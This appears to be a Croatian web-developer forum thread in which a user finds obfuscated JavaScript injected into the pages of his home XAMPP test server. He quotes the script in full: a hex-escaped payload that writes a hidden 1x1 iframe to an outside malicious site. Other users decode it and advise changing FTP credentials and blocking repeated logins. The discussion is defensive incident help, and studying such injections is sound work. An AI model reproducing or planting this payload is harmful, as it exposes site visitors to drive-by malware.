Izmjenjen kod stranica

Imam problem.
Danas sam na serveru kojeg pogonim na zasebnom računalu doma i koji je vidjliv prema “van” (koristim ga za isprobavanje stranica i za prezentacije naručiteljima prije nego ih dignem na njihov server), na stranicama koje su su na njemu pojavio dio koda u kodu:

<html><body><script language='JavaScript'>document.write(unescape('\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x6A\x75\x73\x74\x77\x69\x6E\x62\x69\x67\x2E\x63\x6F\x6D\x2F\x73\x68\x67\x2E\x68\x74\x6D\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x31\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x31\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x20'))</script></body></html>

Server je apache (xampp) na windowsima XP 32 bit. Od servisa su uključeni www, ftp i mysql. Mysql je netaknut, ali unutar stranica (html i php) umetnut je gore navedeni kod.

O čemu se radi? Ima li tko kakva iskustva ili prijedlog?

netko ti je ubacio svoj javascript kod u html

sad, jel nekakav malware, redirect na neku drugu stranicu ako posjeta stiže recimo s googlea ili nešt treće…

probal sam dekodirat i veli da je to iframe koji pokazuje na neki maliciozni sajt justwinbig . com / shg . html

ne preporučam otvaranje ovogo gore

stavis “window.alert” umjesto “document.write” i dobijes:


Mozda.

[quote=“Nosf”]


Mozda.[/quote]

To je to.
Uglavnom, riješio sam i zamijenio pass na FTP serveru.
I vidim u logu da se neki papak pokušava spojit i dalje…

složiš si onda neki firewall koji izbaci ip kad tak 3-4 puta ne uspije se spojit na ftp i gotovo

XP i nije baš neki serverski OS :smiley: Ako ti je to zasebna mašina što ne instaliraš neki Server OS? Ako biraš linuxe onda nemoj instaliravati X-Server, i nemoj instaliravati ovaj xampp nemam pojma koliko mu je konfiguracija sigurna, prouči malo konfiguriranje svega što ti treba i uradi to pošteno sam, ionako to je posao koji se radi jednom

Ma slažem se sa tobom i o tome sam razmišljao davno dok sam sastavljao server - koji OS stavit gore. Prvo sam stavio win2000 server, međutim problem mi je bio sa antivirusom (jer sam htio na server stavit antivirus za svaki slučaj, obzirom doma u mreži imam još dodatna tri računala - jedno ženino, drugo moje na kojm radim i ponekad laptop). Kako nisam mogao nać free antivirus koji podržava i server izdanja windowsa, druga opcija je bio neki unix, al kako sam sa unixima na “gospon Vi”, stavio sam XP-e.

Ionako server nije public, pa mi nije bilo previše od važnosti da bude ultra-super safe (ioanko su gore kao što rekoh, siteovi na kojima se radi)…


Copyright © 2020 WM Forum - AboutContact - Sponsored by: Mydataknox & Webmaster.Ninja